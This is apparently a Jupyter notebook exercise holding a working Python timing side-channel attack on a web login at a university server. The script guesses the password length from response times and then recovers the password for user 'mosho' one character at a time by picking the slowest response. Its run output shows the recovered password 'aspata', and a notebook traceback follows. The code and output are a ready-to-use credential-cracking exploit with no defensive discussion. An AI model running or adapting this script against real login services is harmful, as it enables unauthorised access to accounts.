In [1]:
import sys
import time
import string
import statistics

import requests

from operator import itemgetter

URL = "http://aoi.ise.bgu.ac.il"
N = 5
MAX_TOKEN_SIZE = 32


class PasswordFound(Exception):

    def __init__(self, password):
        self.password = password


def try_to_hack(characters):
    timings = []

    # Print a . without a newline
    print('.', end='', flush=True)

    # Do N HTTP calls
    for i in range(N):
        before = time.perf_counter()
        result = requests.get(URL, params={'user': 'mosho', 'password': characters})
        after = time.perf_counter()

        if result.content == b'1':
            raise PasswordFound(characters)

        timings.append(after - before)

    return timings


def find_next_character(base, TOKEN_SIZE):
    measures = []
    
    print("Trying to find the character at position %s with prefix %r" % ((len(base) + 1), base))
    for i, character in enumerate(string.ascii_lowercase):
        timings = try_to_hack(base + character + "0" * (TOKEN_SIZE - len(base) - 1))

        median = statistics.median(timings)
        min_timing = min(timings)
        max_timing = max(timings)
        stddev = statistics.stdev(timings)

        print(f'searching: {base + character + "0" * (TOKEN_SIZE - len(base) - 1)}', {'character': character, 'median': median, 'min': min_timing,
                         'max': max_timing, 'stddev': stddev})
        
        measures.append({'character': character, 'median': median, 'min': min_timing,
                         'max': max_timing, 'stddev': stddev})

    sorted_measures = list(sorted(measures, key=itemgetter('median'), reverse=True))

    found_character = sorted_measures[0]
    top_characters = sorted_measures[1:4]

    print("Found character at position %s: %r" % ((len(base) + 1), found_character['character']))
    msg = "Median: %s Max: %s Min: %s Stddev: %s"
    print(msg % (found_character['median'], found_character['max'], found_character['min'], found_character['stddev']))

    print()
    print("Following characters were:")

    for top_character in top_characters:
        ratio = int((1 - (top_character['median'] / found_character['median'])) * 100)
        msg ="Character: %r Median: %s Max: %s Min: %s Stddev: %s (%d%% slower)"
        print(msg % (top_character['character'], top_character['median'], top_character['max'], top_character['min'], top_character['stddev'], ratio))

    return found_character['character']


def main():
    # Do a first request to start the keep-alive connection
    requests.get(URL)

    base = ''
    times_by_len = dict()
    
    for pass_length in range(1, MAX_TOKEN_SIZE+1):
        characters = 'a' * pass_length

        before = time.perf_counter()
        result = requests.get(URL, params={'user': 'mosho', 'password': characters})
        after = time.perf_counter()

        times_by_len[pass_length] = after - before
        print(f'Checking length of {pass_length}: time: {times_by_len[pass_length]}')
    
    # Password length is set to the maximum response time from the server.
    # This 'max' function returns the key that has the maximum value.
    TOKEN_SIZE = max(times_by_len, key=times_by_len.get)
    print(f'The password assumed length: {TOKEN_SIZE}\n')
    
    try:
        while len(base) != TOKEN_SIZE:
            next_character = find_next_character(base, TOKEN_SIZE)
            base += next_character
            print("\n\n", end="")
    except PasswordFound as e:
        print("\n\n", end="")
        print("The token is: %r %s" % (e.password, '!'*10))
        sys.exit(0)
    else:
        print("The password is not found, check the allowed character and token size")
        sys.exit(1)


if __name__ == '__main__':
    main()

Checking length of 1: time: 0.04104849999999999
Checking length of 2: time: 0.05163670000000001
Checking length of 3: time: 0.1639703
Checking length of 4: time: 0.04821690000000001
Checking length of 5: time: 0.051455200000000034
Checking length of 6: time: 0.9938669000000001
Checking length of 7: time: 0.17229269999999985
Checking length of 8: time: 0.04522879999999985
Checking length of 9: time: 0.04700380000000015
Checking length of 10: time: 0.05270869999999994
Checking length of 11: time: 0.14664169999999999
Checking length of 12: time: 0.050915400000000055
Checking length of 13: time: 0.049948799999999904
Checking length of 14: time: 0.048822799999999944
Checking length of 15: time: 0.16317650000000006
Checking length of 16: time: 0.04337189999999991
Checking length of 17: time: 0.0703096999999997
Checking length of 18: time: 0.15211229999999976
Checking length of 19: time: 0.06722550000000016
Checking length of 20: time: 0.04570659999999993
Checking length of 21: time: 0.183947

.searching: an0000 {'character': 'n', 'median': 0.9341978999999867, 'min': 0.9258637000000078, 'max': 0.9921827000000008, 'stddev': 0.029154257055396943}
.searching: ao0000 {'character': 'o', 'median': 0.9127313999999842, 'min': 0.8710770000000139, 'max': 0.9432864999999993, 'stddev': 0.02595061111630361}
.searching: ap0000 {'character': 'p', 'median': 0.9208846999999878, 'min': 0.8919813999999917, 'max': 0.9333729999999889, 'stddev': 0.016384442953395615}
.searching: aq0000 {'character': 'q', 'median': 0.9088323000000003, 'min': 0.8808488999999895, 'max': 0.9401378000000022, 'stddev': 0.0236204069701822}
.searching: ar0000 {'character': 'r', 'median': 0.9472973999999965, 'min': 0.8844682000000148, 'max': 1.1597271999999919, 'stddev': 0.11047324331324217}
.searching: as0000 {'character': 's', 'median': 1.1713842999999997, 'min': 1.1625323000000094, 'max': 1.193987600000014, 'stddev': 0.012180417252420693}
.searching: at0000 {'character': 't', 'median': 0.9178708999999969, 'min': 0.8904

.searching: asph00 {'character': 'h', 'median': 1.4171678999999813, 'min': 1.3210280000000125, 'max': 1.7286900000000287, 'stddev': 0.15514144929936002}
.searching: aspi00 {'character': 'i', 'median': 1.4285039999999753, 'min': 1.3895612000000028, 'max': 1.476724499999989, 'stddev': 0.03415192801137827}
.searching: aspj00 {'character': 'j', 'median': 1.4171615000000202, 'min': 1.4001633999999967, 'max': 1.4532823000000121, 'stddev': 0.023923146953983156}
.searching: aspk00 {'character': 'k', 'median': 1.4117727000000286, 'min': 1.3740937999999687, 'max': 1.4507588999999825, 'stddev': 0.03128908020758653}
.searching: aspl00 {'character': 'l', 'median': 1.3925135999999725, 'min': 1.3698159999999575, 'max': 1.4082683999999972, 'stddev': 0.015247957745233152}
.searching: aspm00 {'character': 'm', 'median': 1.407221600000014, 'min': 1.341357099999982, 'max': 1.4346859000000336, 'stddev': 0.03661308005669329}
.searching: aspn00 {'character': 'n', 'median': 1.3837350000000015, 'min': 1.351689

ERROR:root:Internal Python error in the inspect module.
Below is the traceback from this internal error.





The token is: 'aspata' !!!!!!!!!!
Traceback (most recent call last):
  File "<ipython-input-1-5c853c558467>", line 103, in main
    next_character = find_next_character(base, TOKEN_SIZE)
  File "<ipython-input-1-5c853c558467>", line 46, in find_next_character
    timings = try_to_hack(base + character + "0" * (TOKEN_SIZE - len(base) - 1))
  File "<ipython-input-1-5c853c558467>", line 34, in try_to_hack
    raise PasswordFound(characters)
PasswordFound: aspata

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "C:\ProgramData\Miniconda3\lib\site-packages\IPython\core\interactiveshell.py", line 3343, in run_code
    exec(code_obj, self.user_global_ns, self.user_ns)
  File "<ipython-input-1-5c853c558467>", line 116, in <module>
    main()
  File "<ipython-input-1-5c853c558467>", line 109, in main
    sys.exit(0)
SystemExit: 0

During handling of the above exception, another exception occurred:

Traceback (most recent call last

TypeError: object of type 'NoneType' has no len()